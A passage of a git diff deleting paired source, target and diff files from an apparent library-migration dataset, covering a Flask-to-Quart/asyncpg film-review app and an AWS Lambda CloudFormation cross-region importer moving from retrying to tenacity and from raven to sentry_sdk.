- - """ - # We need to overallocate by a fraction to make /dev/shm large enough for the - # request amount in `data_passing_memory_size` - return int(data_passing_memory_size * 1.2) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.diff b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.diff deleted file mode 100644 index 82800ff..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.diff +++ /dev/null @@ -1,57 +0,0 @@ -diff --git a/app/films.py b/app/films.py - index 253538aa8cd65a3ed48563c2ea4594d998286293..0a70f2bddae90da13da5bce2b77ea56355ecc5d1 100644 - --- a/app/films.py - +++ b/app/films.py -@@ -1,21 +1,20 @@ --from flask import abort, Blueprint, current_app, jsonify, request -+from quart import abort, Blueprint, current_app, jsonify, request - - blueprint = Blueprint('films', __name__) - - - @blueprint.route('/films/') --def get_films(): -+async def get_films(): - minimal_year = request.args.get('year.gt', 2000) - films = {} -- with current_app.pool.acquire() as connection: -- with connection.cursor() as cursor: -- cursor.execute( -+ async with current_app.pool.acquire() as connection: -+ async with connection.transaction(): -+ async for film in connection.cursor( - """SELECT film_id, release_year, title - FROM film -- WHERE release_year > %s""", -- (minimal_year,), -- ) -- for film in cursor: -+ WHERE release_year > $1""", -+ minimal_year, -+ ): - films[film['film_id']] = { - 'release_year': film['release_year'], - 'title': film['title'], -@@ -24,16 +23,15 @@ def get_films(): - - - @blueprint.route('/films//') --def get_film(id): -- with current_app.pool.acquire() as connection: -- with connection.cursor() as cursor: -- cursor.execute( -+async def get_film(id): -+ async with current_app.pool.acquire() as connection: -+ async with connection.transaction(): -+ result = await connection.fetchrow( - """SELECT film_id, release_year, title - FROM film -- WHERE film_id = %s""", -- (id,), -+ WHERE film_id = $1""", -+ id, - ) -- result = cursor.fetchone() - if result is not None: - return jsonify({ - 'film_id': result['film_id'], diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.source.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.source.py deleted file mode 100644 index 0b896fe..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.source.py +++ /dev/null @@ -1,44 +0,0 @@ -from flask import abort, Blueprint, current_app, jsonify, request - -blueprint = Blueprint('films', __name__) - - -@blueprint.route('/films/') -def get_films(): - minimal_year = request.args.get('year.gt', 2000) - films = {} - with current_app.pool.acquire() as connection: - with connection.cursor() as cursor: - cursor.execute( - """SELECT film_id, release_year, title - FROM film - WHERE release_year > %s""", - (minimal_year,), - ) - for film in cursor: - films[film['film_id']] = { - 'release_year': film['release_year'], - 'title': film['title'], - } - return jsonify(films) - - -@blueprint.route('/films//') -def get_film(id): - with current_app.pool.acquire() as connection: - with connection.cursor() as cursor: - cursor.execute( - """SELECT film_id, release_year, title - FROM film - WHERE film_id = %s""", - (id,), - ) - result = cursor.fetchone() - if result is not None: - return jsonify({ - 'film_id': result['film_id'], - 'release_year': result['release_year'], - 'title': result['title'], - }) - else: - abort(404) diff 
--git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.target.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.target.py deleted file mode 100644 index 198d4c8..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.target.py +++ /dev/null @@ -1,42 +0,0 @@ -from quart import abort, Blueprint, current_app, jsonify, request - -blueprint = Blueprint('films', __name__) - - -@blueprint.route('/films/') -async def get_films(): - minimal_year = request.args.get('year.gt', 2000) - films = {} - async with current_app.pool.acquire() as connection: - async with connection.transaction(): - async for film in connection.cursor( - """SELECT film_id, release_year, title - FROM film - WHERE release_year > $1""", - minimal_year, - ): - films[film['film_id']] = { - 'release_year': film['release_year'], - 'title': film['title'], - } - return jsonify(films) - - -@blueprint.route('/films//') -async def get_film(id): - async with current_app.pool.acquire() as connection: - async with connection.transaction(): - result = await connection.fetchrow( - """SELECT film_id, release_year, title - FROM film - WHERE film_id = $1""", - id, - ) - if result is not None: - return jsonify({ - 'film_id': result['film_id'], - 'release_year': result['release_year'], - 'title': result['title'], - }) - else: - abort(404) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.diff b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.diff deleted file mode 100644 index d0b4aa4..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.diff +++ /dev/null @@ -1,34 +0,0 @@ -diff --git a/app/reviews.py b/app/reviews.py - index 253538aa8cd65a3ed48563c2ea4594d998286293..0a70f2bddae90da13da5bce2b77ea56355ecc5d1 100644 - --- a/app/reviews.py - +++ b/app/reviews.py -@@ -1,20 +1,19 @@ --from flask import abort, Blueprint, current_app, jsonify, request -+from quart import abort, Blueprint, current_app, jsonify, request - - blueprint = Blueprint('reviews', __name__) - - - @blueprint.route('/reviews/', methods=['POST']) --def add_review(): -- data = request.get_json() -+async def add_review(): -+ data = await request.get_json() - film_id = data['film_id'] - rating = int(data['rating']) -- with current_app.pool.acquire() as connection: -- with connection.cursor() as cursor: -- cursor.execute( -- """INSERT INTO review (film_id, rating) -- VALUES (%s, %s)""", -- (film_id, rating), -- ) -+ async with current_app.pool.acquire() as connection: -+ await connection.execute( -+ """INSERT INTO review (film_id, rating) -+ VALUES ($1, $2)""", -+ film_id, rating, -+ ) - return jsonify({ - 'film_id': film_id, - 'rating': rating, diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.source.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.source.py deleted file mode 100644 index 2674208..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.source.py +++ /dev/null @@ -1,21 +0,0 @@ -from flask import abort, Blueprint, current_app, jsonify, request - -blueprint = Blueprint('reviews', __name__) - - -@blueprint.route('/reviews/', methods=['POST']) -def add_review(): - data = request.get_json() - film_id = data['film_id'] - rating = int(data['rating']) - with current_app.pool.acquire() as connection: - with connection.cursor() as cursor: - cursor.execute( - """INSERT INTO review (film_id, 
rating) - VALUES (%s, %s)""", - (film_id, rating), - ) - return jsonify({ - 'film_id': film_id, - 'rating': rating, - }) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.target.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.target.py deleted file mode 100644 index 41d33b2..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.target.py +++ /dev/null @@ -1,20 +0,0 @@ -from quart import abort, Blueprint, current_app, jsonify, request - -blueprint = Blueprint('reviews', __name__) - - -@blueprint.route('/reviews/', methods=['POST']) -async def add_review(): - data = await request.get_json() - film_id = data['film_id'] - rating = int(data['rating']) - async with current_app.pool.acquire() as connection: - await connection.execute( - """INSERT INTO review (film_id, rating) - VALUES ($1, $2)""", - film_id, rating, - ) - return jsonify({ - 'film_id': film_id, - 'rating': rating, - }) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.diff b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.diff deleted file mode 100644 index 26f52b1..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.diff +++ /dev/null @@ -1,55 +0,0 @@ -diff --git a/app/run.py b/app/run.py - index 253538aa8cd65a3ed48563c2ea4594d998286293..0a70f2bddae90da13da5bce2b77ea56355ecc5d1 100644 - --- a/app/run.py - +++ b/app/run.py -@@ -1,44 +1,21 @@ - import os - from contextlib import contextmanager - --from flask import Flask --from psycopg2.extras import RealDictCursor --from psycopg2.pool import ThreadedConnectionPool -+import asyncpg -+from quart import Quart - - from films import blueprint as films_blueprint - from reviews import blueprint as reviews_blueprint - - --class PoolWrapper: -- """Exists to provide an acquire method for easy usage. -- -- pool = PoolWrapper(...) -- with pool.acquire() as conneciton: -- connection.execute(...) 
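The three pgjones file pairs capture a coupled migration: Flask to Quart on the web layer and psycopg2 to asyncpg for database access, so every handler, context manager, and query call gains an async/await form, and %s parameter tuples become asyncpg's positional $1 placeholders. A minimal sketch of the resulting handler shape, condensed from the films.py hunks:

    from quart import current_app

    async def get_film(id):
        # psycopg2: cursor.execute("... WHERE film_id = %s", (id,)) then fetchone()
        # asyncpg: fetchrow() with a numbered placeholder and a positional argument
        async with current_app.pool.acquire() as connection:
            async with connection.transaction():
                return await connection.fetchrow(
                    """SELECT film_id, release_year, title
                       FROM film
                       WHERE film_id = $1""",
                    id,
                )
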
-- """ -- -- def __init__(self, max_pool_size: int, *, dsn): -- self._pool = ThreadedConnectionPool( -- 1, max_pool_size, dsn=dsn, cursor_factory=RealDictCursor, -- ) -- -- @contextmanager -- def acquire(self): -- try: -- connection = self._pool.getconn() -- yield connection -- finally: -- self._pool.putconn(connection) -- -- - def create_app(): -- app = Flask(__name__) -+ app = Quart(__name__) - app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False - - @app.before_first_request -- def create_db(): -- dsn = 'host=0.0.0.0 port=5432 dbname=dvdrental user=dvdrental password=dvdrental' -- app.pool = PoolWrapper(20, dsn=dsn) #os.environ['DB_DSN']) -+ async def create_db(): -+ dsn = 'postgres://dvdrental:dvdrental@0.0.0.0:5432/dvdrental' -+ app.pool = await asyncpg.create_pool(dsn, max_size=20) #os.environ['DB_DSN']) - - app.register_blueprint(films_blueprint) - app.register_blueprint(reviews_blueprint) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.source.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.source.py deleted file mode 100644 index 52b980b..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.source.py +++ /dev/null @@ -1,50 +0,0 @@ -import os -from contextlib import contextmanager - -from flask import Flask -from psycopg2.extras import RealDictCursor -from psycopg2.pool import ThreadedConnectionPool - -from films import blueprint as films_blueprint -from reviews import blueprint as reviews_blueprint - - -class PoolWrapper: - """Exists to provide an acquire method for easy usage. - - pool = PoolWrapper(...) - with pool.acquire() as conneciton: - connection.execute(...) - """ - - def __init__(self, max_pool_size: int, *, dsn): - self._pool = ThreadedConnectionPool( - 1, max_pool_size, dsn=dsn, cursor_factory=RealDictCursor, - ) - - @contextmanager - def acquire(self): - try: - connection = self._pool.getconn() - yield connection - finally: - self._pool.putconn(connection) - - -def create_app(): - app = Flask(__name__) - app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False - - @app.before_first_request - def create_db(): - dsn = 'host=0.0.0.0 port=5432 dbname=dvdrental user=dvdrental password=dvdrental' - app.pool = PoolWrapper(20, dsn=dsn) #os.environ['DB_DSN']) - - app.register_blueprint(films_blueprint) - app.register_blueprint(reviews_blueprint) - - return app - - -if __name__ == '__main__': - create_app().run() diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.target.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.target.py deleted file mode 100644 index f96ad08..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.target.py +++ /dev/null @@ -1,27 +0,0 @@ -import os -from contextlib import contextmanager - -import asyncpg -from quart import Quart - -from films import blueprint as films_blueprint -from reviews import blueprint as reviews_blueprint - - -def create_app(): - app = Quart(__name__) - app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False - - @app.before_first_request - async def create_db(): - dsn = 'postgres://dvdrental:dvdrental@0.0.0.0:5432/dvdrental' - app.pool = await asyncpg.create_pool(dsn, max_size=20) #os.environ['DB_DSN']) - - app.register_blueprint(films_blueprint) - app.register_blueprint(reviews_blueprint) - - return app - - -if __name__ == '__main__': - create_app().run() diff --git 
a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.diff b/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.diff
deleted file mode 100644
index 721c19d..0000000
--- a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.diff
+++ /dev/null
@@ -1,60 +0,0 @@
-diff --git a/importer/lambda/cross_region_importer.py b/importer/lambda/cross_region_importer.py
- index 0d18181985c3ae2ce534bcb22b4ddeffd812669a..8d0ec687838ea69612d7b1236e2341198aef7937 100644
- --- a/importer/lambda/cross_region_importer.py
- +++ b/importer/lambda/cross_region_importer.py
-@@ -4,10 +4,10 @@ import uuid
- from collections import namedtuple
- 
- import boto3
-+import requests
- from boto3.dynamodb.conditions import Key, Attr
- from botocore.exceptions import ClientError
--from botocore.vendored import requests
--from retrying import retry
-+from tenacity import retry, retry_if_exception_type, wait_random_exponential
- 
- RESOURCE_TYPE = 'Custom::CrossRegionImporter'
- SUCCESS = "SUCCESS"
-@@ -103,8 +103,7 @@ def _create_new_cross_stack_references(requested_exports, importer_context, tabl
-     for label, export_name in requested_exports.items():
-         cross_stack_ref_id = f'{physical_resource_id}|{export_name}'
-         print(f'Adding cross-stack ref: {cross_stack_ref_id}')
--        _dynamodb_throttling_safe_operation(
--            operation=cross_stack_ref_table.put_item,
-+        cross_stack_ref_table.put_item(
-             Item={
-                 'CrossStackRefId': cross_stack_ref_id,
-                 'ImporterStackId': importer_context.stack_id,
-@@ -159,6 +158,10 @@ def _delete_cross_stack_references(exports_to_remove, importer_context, table_in
-         raise
- 
- 
-+@retry(
-+    wait=wait_random_exponential(multiplier=1, max=30),
-+    retry=retry_if_exception_type(ClientError),
-+)
- def _get_cloudformation_exports(target_region):
-     cloudformation_client = boto3.client('cloudformation', region_name=target_region)
-     paginator = cloudformation_client.get_paginator('list_exports')
-@@ -178,21 +181,6 @@ class ExportNotFoundError(Exception):
-             'Export: {name} not found in exports'.format(name=name))
- 
- 
--def _retry_if_throttled(exception):
--    throttling_exceptions = ('ProvisionedThroughputExceededException', 'ThrottlingException')
--    should_retry = exception.response['Error']['Code'] in throttling_exceptions
--
--    if should_retry:
--        print('CrossStackRefTable state table is busy, retrying...')
--
--    return should_retry
--
--
--@retry(stop_max_attempt_number=3, wait_random_min=1000, wait_random_max=5000, retry_on_exception=_retry_if_throttled)
--def _dynamodb_throttling_safe_operation(operation, **kwargs):
--    operation(**kwargs)
--
--
- def send(event, context, response_status, response_data, physical_resource_id, reason=None):
-     response_url = event['ResponseURL']
- 
diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.source.py b/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.source.py
deleted file mode 100644
index ad35315..0000000
--- a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.source.py
+++ /dev/null
@@ -1,221 +0,0 @@
-import json
-import os
-import uuid
-from collections import namedtuple
-
-import boto3
-from boto3.dynamodb.conditions import Key, Attr
-from botocore.exceptions import ClientError
-from botocore.vendored import requests
-from retrying import retry
-
-RESOURCE_TYPE = 'Custom::CrossRegionImporter'
-SUCCESS = "SUCCESS"
-FAILED = "FAILED"
-FAILED_PHYSICAL_RESOURCE_ID = "FAILED_PHYSICAL_RESOURCE_ID"
-
-ImporterContext = namedtuple(
-    'ImporterContext',
-    [
-        'stack_id',
-        'logical_resource_id',
-    ]
-)
-
-
-class TableInfo(object):
-    def __init__(self, table_arn):
-        self.table_name = table_arn.split('/')[1]
-        self.target_region = table_arn.split(':')[3]
-
-
-def lambda_handler(event, context):
-    try:
-        _lambda_handler(event, context)
-    except Exception as e:
-        send(
-            event,
-            context,
-            response_status=FAILED if event['RequestType'] != 'Delete' else SUCCESS,
-            # Do not fail on delete to avoid rollback failure
-            response_data=None,
-            physical_resource_id=event.get('PhysicalResourceId', FAILED_PHYSICAL_RESOURCE_ID),
-            reason=str(e)
-        )
-        raise
-
-
-def _lambda_handler(event, context):
-    print("Received event: " + json.dumps(event))
-
-    resource_type = event['ResourceType']
-    if resource_type != RESOURCE_TYPE:
-        raise ValueError(f'Unexpected resource_type: {resource_type}. Use "{RESOURCE_TYPE}"')
-
-    request_type = event['RequestType']
-    physical_resource_id = None
-    resource_properties = event['ResourceProperties']
-    requested_exports = resource_properties.get('Exports', {})
-
-    importer_context = ImporterContext(stack_id=event['StackId'], logical_resource_id=event['LogicalResourceId'])
-    table_info = TableInfo(os.environ['CROSS_STACK_REF_TABLE_ARN'])
-
-    response_data = {}
-
-    if request_type in ['Create', 'Update']:
-        physical_resource_id = str(uuid.uuid4())
-        response_data = _create_new_cross_stack_references(
-            requested_exports,
-            importer_context,
-            table_info,
-            physical_resource_id
-        )
-
-    elif request_type == 'Delete':
-        physical_resource_id = event['PhysicalResourceId']
-        _delete_cross_stack_references(requested_exports, importer_context, table_info, physical_resource_id)
-
-    else:
-        print('Request type is {request_type}, doing nothing.'.format(request_type=request_type))
-
-    send(
-        event,
-        context,
-        response_status=SUCCESS,
-        response_data=response_data,
-        physical_resource_id=physical_resource_id,
-    )
-
-
-def _create_new_cross_stack_references(requested_exports, importer_context, table_info, physical_resource_id):
-    exports = _get_cloudformation_exports(table_info.target_region)
-
-    try:
-        response_data = {
-            label: exports[export_name]['Value'] for label, export_name in requested_exports.items()
-        }
-    except KeyError as e:
-        raise ExportNotFoundError(e.args[0])
-
-    dynamodb_resource = boto3.resource('dynamodb', region_name=table_info.target_region)
-    cross_stack_ref_table = dynamodb_resource.Table(table_info.table_name)
-
-    for label, export_name in requested_exports.items():
-        cross_stack_ref_id = f'{physical_resource_id}|{export_name}'
-        print(f'Adding cross-stack ref: {cross_stack_ref_id}')
-        _dynamodb_throttling_safe_operation(
-            operation=cross_stack_ref_table.put_item,
-            Item={
-                'CrossStackRefId': cross_stack_ref_id,
-                'ImporterStackId': importer_context.stack_id,
-                'ImporterLogicalResourceId': importer_context.logical_resource_id,
-                'ImporterLabel': label,
-                'ExporterStackId': exports[export_name]['ExportingStackId'],
-                'ExportName': export_name,
-            }
-        )
-
-    return response_data
-
-
-def _delete_cross_stack_references(exports_to_remove, importer_context, table_info, physical_resource_id):
-    dynamodb_resource = boto3.resource('dynamodb', region_name=table_info.target_region)
-    cross_stack_ref_table = dynamodb_resource.Table(table_info.table_name)
-
-    for label, export_name in exports_to_remove.items():
-        cross_stack_ref_id = f'{physical_resource_id}|{export_name}'
-        print(f'Removing cross-stack ref: {cross_stack_ref_id}')
-        try:
-            cross_stack_ref_table.delete_item(
-                Key={'CrossStackRefId': cross_stack_ref_id},
-                ConditionExpression=Attr('CrossStackRefId').eq(cross_stack_ref_id),
-            )
-        except ClientError as e:
-            if 'The conditional request failed' in str(e):
-                print(f'{cross_stack_ref_id} was not found, scanning to get the key name')
-                scan_response = cross_stack_ref_table.scan(
-                    FilterExpression=
-                    Key('ExportName').eq(export_name) &
-                    Key('ImporterStackId').eq(importer_context.stack_id) &
-                    Key('ImporterLabel').eq(label) &
-                    Key('ImporterLogicalResourceId').eq(importer_context.logical_resource_id)
-                )
-                cross_stack_ref_ids = [
-                    cross_ref_id['CrossStackRefId'] for cross_ref_id in scan_response['Items']
-                    if cross_ref_id != cross_stack_ref_id
-                ]
-
-                while scan_response.get('LastEvaluatedKey'):  # This loop manage pagination of results
-                    scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response['LastEvaluatedKey'])
-                    cross_stack_ref_ids.extend([cross_ref_id['CrossStackRefId'] for cross_ref_id in scan_response['Items']])
-
-                for ref_id in cross_stack_ref_ids:
-                    print(f'Deleting {ref_id}')
-                    cross_stack_ref_table.delete_item(
-                        Key={'CrossStackRefId': ref_id},
-                        ConditionExpression=Attr('CrossStackRefId').eq(ref_id),
-                    )
-            else:
-                raise
-
-
-def _get_cloudformation_exports(target_region):
-    cloudformation_client = boto3.client('cloudformation', region_name=target_region)
-    paginator = cloudformation_client.get_paginator('list_exports')
-    exports_page_iterator = paginator.paginate()
-    exports = {
-        export['Name']: {
-            'Value': export['Value'],
-            'ExportingStackId': export['ExportingStackId'],
-        } for page in exports_page_iterator for export in page['Exports']
-    }
-    return exports
-
-
-class ExportNotFoundError(Exception):
-    def __init__(self, name):
-        super(ExportNotFoundError, self).__init__(
-            'Export: {name} not found in exports'.format(name=name))
-
-
-def _retry_if_throttled(exception):
-    throttling_exceptions = ('ProvisionedThroughputExceededException', 'ThrottlingException')
-    should_retry = exception.response['Error']['Code'] in throttling_exceptions
-
-    if should_retry:
-        print('CrossStackRefTable state table is busy, retrying...')
-
-    return should_retry
-
-
-@retry(stop_max_attempt_number=3, wait_random_min=1000, wait_random_max=5000, retry_on_exception=_retry_if_throttled)
-def _dynamodb_throttling_safe_operation(operation, **kwargs):
-    operation(**kwargs)
-
-
-def send(event, context, response_status, response_data, physical_resource_id, reason=None):
-    response_url = event['ResponseURL']
-
-    response_body = {
-        'Status': response_status,
-        'Reason': str(reason) if reason else 'See the details in CloudWatch Log Stream: ' + context.log_stream_name,
-        'PhysicalResourceId': physical_resource_id,
-        'StackId': event['StackId'],
-        'RequestId': event['RequestId'],
-        'LogicalResourceId': event['LogicalResourceId'],
-        'Data': response_data,
-    }
-
-    json_response_body = json.dumps(response_body)
-    print("Response data: " + json_response_body)
-
-    headers = {
-        'content-type': '',
-        'content-length': str(len(json_response_body))
-    }
-
-    requests.put(
-        response_url,
-        data=json_response_body,
-        headers=headers
-    )
diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.target.py b/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.target.py
deleted file mode 100644
index 3ea1916..0000000
--- a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.target.py
+++ /dev/null
@@ -1,209 +0,0 @@
-import json
-import os
-import uuid
-from collections import namedtuple
-
-import boto3
-import requests
-from boto3.dynamodb.conditions import Key, Attr
-from botocore.exceptions import ClientError
-from tenacity import retry, retry_if_exception_type, wait_random_exponential
-
-RESOURCE_TYPE = 'Custom::CrossRegionImporter'
-SUCCESS = "SUCCESS"
-FAILED = "FAILED"
-FAILED_PHYSICAL_RESOURCE_ID = "FAILED_PHYSICAL_RESOURCE_ID"
-
-ImporterContext = namedtuple(
-    'ImporterContext',
-    [
-        'stack_id',
-        'logical_resource_id',
-    ]
-)
-
-
-class TableInfo(object):
-    def __init__(self, table_arn):
-        self.table_name = table_arn.split('/')[1]
-        self.target_region = table_arn.split(':')[3]
-
-
-def lambda_handler(event, context):
-    try:
-        _lambda_handler(event, context)
-    except Exception as e:
-        send(
-            event,
-            context,
-            response_status=FAILED if event['RequestType'] != 'Delete' else SUCCESS,
-            # Do not fail on delete to avoid rollback failure
-            response_data=None,
-            physical_resource_id=event.get('PhysicalResourceId', FAILED_PHYSICAL_RESOURCE_ID),
-            reason=str(e)
-        )
-        raise
-
-
-def _lambda_handler(event, context):
-    print("Received event: " + json.dumps(event))
-
-    resource_type = event['ResourceType']
-    if resource_type != RESOURCE_TYPE:
-        raise ValueError(f'Unexpected resource_type: {resource_type}. Use "{RESOURCE_TYPE}"')
-
-    request_type = event['RequestType']
-    physical_resource_id = None
-    resource_properties = event['ResourceProperties']
-    requested_exports = resource_properties.get('Exports', {})
-
-    importer_context = ImporterContext(stack_id=event['StackId'], logical_resource_id=event['LogicalResourceId'])
-    table_info = TableInfo(os.environ['CROSS_STACK_REF_TABLE_ARN'])
-
-    response_data = {}
-
-    if request_type in ['Create', 'Update']:
-        physical_resource_id = str(uuid.uuid4())
-        response_data = _create_new_cross_stack_references(
-            requested_exports,
-            importer_context,
-            table_info,
-            physical_resource_id
-        )
-
-    elif request_type == 'Delete':
-        physical_resource_id = event['PhysicalResourceId']
-        _delete_cross_stack_references(requested_exports, importer_context, table_info, physical_resource_id)
-
-    else:
-        print('Request type is {request_type}, doing nothing.'.format(request_type=request_type))
-
-    send(
-        event,
-        context,
-        response_status=SUCCESS,
-        response_data=response_data,
-        physical_resource_id=physical_resource_id,
-    )
-
-
-def _create_new_cross_stack_references(requested_exports, importer_context, table_info, physical_resource_id):
-    exports = _get_cloudformation_exports(table_info.target_region)
-
-    try:
-        response_data = {
-            label: exports[export_name]['Value'] for label, export_name in requested_exports.items()
-        }
-    except KeyError as e:
-        raise ExportNotFoundError(e.args[0])
-
-    dynamodb_resource = boto3.resource('dynamodb', region_name=table_info.target_region)
-    cross_stack_ref_table = dynamodb_resource.Table(table_info.table_name)
-
-    for label, export_name in requested_exports.items():
-        cross_stack_ref_id = f'{physical_resource_id}|{export_name}'
-        print(f'Adding cross-stack ref: {cross_stack_ref_id}')
-        cross_stack_ref_table.put_item(
-            Item={
-                'CrossStackRefId': cross_stack_ref_id,
-                'ImporterStackId': importer_context.stack_id,
-                'ImporterLogicalResourceId': importer_context.logical_resource_id,
-                'ImporterLabel': label,
-                'ExporterStackId': exports[export_name]['ExportingStackId'],
-                'ExportName': export_name,
-            }
-        )
-
-    return response_data
-
-
-def _delete_cross_stack_references(exports_to_remove, importer_context, table_info, physical_resource_id):
-    dynamodb_resource = boto3.resource('dynamodb', region_name=table_info.target_region)
-    cross_stack_ref_table = dynamodb_resource.Table(table_info.table_name)
-
-    for label, export_name in exports_to_remove.items():
-        cross_stack_ref_id = f'{physical_resource_id}|{export_name}'
-        print(f'Removing cross-stack ref: {cross_stack_ref_id}')
-        try:
-            cross_stack_ref_table.delete_item(
-                Key={'CrossStackRefId': cross_stack_ref_id},
-                ConditionExpression=Attr('CrossStackRefId').eq(cross_stack_ref_id),
-            )
-        except ClientError as e:
-            if 'The conditional request failed' in str(e):
-                print(f'{cross_stack_ref_id} was not found, scanning to get the key name')
-                scan_response = cross_stack_ref_table.scan(
-                    FilterExpression=
-                    Key('ExportName').eq(export_name) &
-                    Key('ImporterStackId').eq(importer_context.stack_id) &
-                    Key('ImporterLabel').eq(label) &
-                    Key('ImporterLogicalResourceId').eq(importer_context.logical_resource_id)
-                )
-                cross_stack_ref_ids = [
-                    cross_ref_id['CrossStackRefId'] for cross_ref_id in scan_response['Items']
-                    if cross_ref_id != cross_stack_ref_id
-                ]
-
-                while scan_response.get('LastEvaluatedKey'):  # This loop manage pagination of results
-                    scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response['LastEvaluatedKey'])
-                    cross_stack_ref_ids.extend([cross_ref_id['CrossStackRefId'] for cross_ref_id in scan_response['Items']])
-
-                for ref_id in cross_stack_ref_ids:
-                    print(f'Deleting {ref_id}')
-                    cross_stack_ref_table.delete_item(
-                        Key={'CrossStackRefId': ref_id},
-                        ConditionExpression=Attr('CrossStackRefId').eq(ref_id),
-                    )
-            else:
-                raise
-
-
-@retry(
-    wait=wait_random_exponential(multiplier=1, max=30),
-    retry=retry_if_exception_type(ClientError),
-)
-def _get_cloudformation_exports(target_region):
-    cloudformation_client = boto3.client('cloudformation', region_name=target_region)
-    paginator = cloudformation_client.get_paginator('list_exports')
-    exports_page_iterator = paginator.paginate()
-    exports = {
-        export['Name']: {
-            'Value': export['Value'],
-            'ExportingStackId': export['ExportingStackId'],
-        } for page in exports_page_iterator for export in page['Exports']
-    }
-    return exports
-
-
-class ExportNotFoundError(Exception):
-    def __init__(self, name):
-        super(ExportNotFoundError, self).__init__(
-            'Export: {name} not found in exports'.format(name=name))
-
-
-def send(event, context, response_status, response_data, physical_resource_id, reason=None):
-    response_url = event['ResponseURL']
-
-    response_body = {
-        'Status': response_status,
-        'Reason': str(reason) if reason else 'See the details in CloudWatch Log Stream: ' + context.log_stream_name,
-        'PhysicalResourceId': physical_resource_id,
-        'StackId': event['StackId'],
-        'RequestId': event['RequestId'],
-        'LogicalResourceId': event['LogicalResourceId'],
-        'Data': response_data,
-    }
-
-    json_response_body = json.dumps(response_body)
-    print("Response data: " + json_response_body)
-
-    headers = {
-        'content-type': '',
-        'content-length': str(len(json_response_body))
-    }
-
-    requests.put(
-        response_url,
-        data=json_response_body,
-        headers=headers
-    )
diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.diff b/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.diff
deleted file mode 100644
index ee6eaa2..0000000
--- a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.diff
+++ /dev/null
@@ -1,210 +0,0 @@
-diff --git a/exporter/lambda/cross_region_import_replication.py b/exporter/lambda/cross_region_import_replication.py
- index 59f1fecb2a7fba013a636a775c51471d2afd793b..f1120d34c2a71686e769995300ac7cf09f858e34 100644
- --- a/exporter/lambda/cross_region_import_replication.py
- +++ b/exporter/lambda/cross_region_import_replication.py
-@@ -5,92 +5,73 @@ from uuid import uuid4
- 
- import boto3
- import botocore
--from raven import Client
--from raven.transport import HTTPTransport
-+import sentry_sdk
-+from sentry_sdk.integrations.aws_lambda import AwsLambdaIntegration
- 
--MAX_RESOURCES_PER_TEMPLATE = 200
--RESSOURCE_BY_GROUP = 5
-+sentry_sdk.init(integrations=[AwsLambdaIntegration(timeout_warning=True)])
-+
-+MAX_OUTPUTS_PER_TEMPLATE = 200
- 
- 
- def lambda_handler(*_):
-     try:
-         _lambda_handler()
-     except:
--        # Using a the default transport does not work in a Lambda function.
--        # Must use the HTTPTransport.
--        Client(
--            dsn=os.environ['SENTRY_DSN'],
--            environment=os.environ['SENTRY_ENVIRONMENT'],
--            transport=HTTPTransport
--        ).captureException()
--        # Must raise, otherwise the Lambda will be marked as successful, and the exception
--        # will not be logged to CloudWatch logs.
-         raise
- 
- 
- def _lambda_handler():
